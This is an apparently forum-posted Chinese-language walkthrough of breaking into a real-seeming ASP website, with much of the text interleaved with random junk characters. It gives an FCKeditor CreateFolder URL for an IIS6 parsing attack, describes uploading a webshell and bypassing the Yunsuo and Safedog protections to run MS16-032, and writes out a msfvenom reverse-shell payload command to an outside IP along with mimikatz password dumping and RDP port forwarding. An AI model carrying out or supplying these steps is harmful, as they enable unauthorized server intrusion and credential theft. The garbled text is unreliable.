|
% z- b) K* x2 @- y! g0 A/ O
' c. h2 n" \2 U( X0 ?* w 6 ?8 B0 y, }. a3 Q7 X
, U6 Y/ H( ^) l: w( R9 M! r3 s6 k |
6 V- O) p+ ?- o$ \8 z
4 R7 D% f5 v: i3 \ " ?1 N$ Y2 }9 d- m0 T
一、 利用getwebshell篇 2 _' A" Q2 r: {8 R' D- N
4 e4 }/ C; ~) o5 ~' k' Q6 \2 A4 e首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图: ) e% p2 M" s, U; g8 u; F8 Z* u

" c' U! V. n" [$ j" ~+ |5 a
6 h3 N. g% v; Y+ @ }; x下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
t* M2 _8 Y3 C" L4 W # C5 e) K) J8 z- n4 r! n3 C' |
下面我们构造一个asp目录,如: : @0 q* E! y( X, L
* t; @1 x! Q4 k, k" |9 }% h- `$ w0 s $ v. i7 h+ ?- ^! o, o. D* Q; t* P
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 ' }& }4 `9 B0 ~
: `; _" J# l: X0 l: i/ s! v% h; @
6 o$ m" }: w" F7 ~( v/ F2 K 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。 2 u0 {7 K4 B) G( B: x
: C- N( e, h6 H一、 绕过安全狗云锁提权并且加账号 , \" e- l8 L7 B) H. ~3 c% s
 % S' w+ V( q# Z" \
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
, r8 B8 J% @4 e1 N: D. _
: |4 ?4 W( Y+ T2 v2 G如图:
# w1 ~7 f# z4 B
' W7 Z6 b7 V4 a# ]然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
& v: T" U& y O+ h, _ v
3 W, o) q8 a0 S2 m4 k5 C一、 利用metasploit " E& B/ \# N2 D
0 t. [/ b8 p& N/ T; y* i* m: w3 U首先用pentestbox生成一个64位的payload如下命令 2 D& `$ E, A1 Q
8 A+ p$ a& u+ r* w, U: I. |msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
# j+ C9 E' i0 f. {4 B
4 O* o! c* X5 {8 g为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图: + d# b1 W2 m: R* E$ W

! Y7 E6 b( q) U" x下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图: 7 Q1 z$ P, p' S3 ?! y+ b% H
 ; k& V. v- {' F M! R
下面我们来做一个监听如下命令: & p4 N6 c8 M- K& H4 u
x3 [ _" C/ [) b0 S& G. |portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图: 7 r; ?7 F3 z7 S
( B$ E- i0 c- P- J0 q
$ h' h0 M; W; k7 y' C: n
|
! U+ }1 ~0 z* I# x$ |9 ~ 3 p) Q3 ~( ^0 {3 h/ _; t: S
; U3 Y9 a1 B/ h& v! `$ @$ G
$ A; Z" q: O9 A
" A Y' T5 O6 I7 e! v, h; I u* w- c, h2 t
% X& K5 y5 C4 E* v
! z. t* W8 P! G& w- u
9 g! ~+ Q, q. r' ~
9 G0 ~% R6 z* U, S- M9 p
& s9 A8 D7 Z7 s Q2 r& V; a/ R
& H# s& S' V& l4 k& s
/ q* S6 R/ ~7 h0 `
0 ^6 D- h2 @# T. M9 a; r5 V# E8 T( X
|